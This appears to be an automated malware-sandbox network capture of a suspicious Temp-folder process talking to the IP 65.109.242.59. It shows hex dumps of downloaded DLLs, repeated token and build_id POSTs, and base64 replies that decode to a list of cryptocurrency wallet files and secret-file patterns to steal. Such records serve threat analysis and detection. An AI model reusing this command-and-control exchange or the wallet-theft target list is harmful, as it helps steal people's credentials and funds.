                                                                      2024-05-26 08:29:32 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                      Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                      Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                      Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                      Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                      Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                      2024-05-26 08:29:32 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                      Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.44978665.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:33 UTC178OUTGET /vcruntime140.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:33 UTC245INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:33 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 80880
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-13bf0"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:33 UTC16139INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                      2024-05-26 08:29:33 UTC16384INData Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18
                                                                      Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
                                                                      2024-05-26 08:29:34 UTC16384INData Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47
                                                                      Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
                                                                      2024-05-26 08:29:34 UTC16384INData Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a
                                                                      Data Ascii: t@++t+t+u+uQ<0|*<9&w/c5~bASJCtvB
                                                                      2024-05-26 08:29:34 UTC15589INData Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e
                                                                      Data Ascii: |5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.44978765.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:35 UTC279OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHI
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 1145
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:35 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JJJECFIECBGDGCAAAEHICont
                                                                      2024-05-26 08:29:36 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.44978865.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:37 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----JKFCBAEHCAEGDHJKFHJK
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:37 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------JKFCBAEHCAEGDHJKFHJKContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------JKFCBAEHCAEGDHJKFHJKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JKFCBAEHCAEGDHJKFHJKCont
                                                                      2024-05-26 08:29:38 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:38 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:38 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.44978965.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:38 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KKFCFBKFCFBFIDGCGDHJCont
                                                                      2024-05-26 08:29:39 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.44979065.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:40 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKEC
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 331
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 4a 4a 4b 45 48 43 41 4b 45 47 43 41 4b 4a 4b 45 43 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------CGIJJKEHCAKEGCAKJKECContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CGIJJKEHCAKEGCAKJKECCont
                                                                      2024-05-26 08:29:41 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:41 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
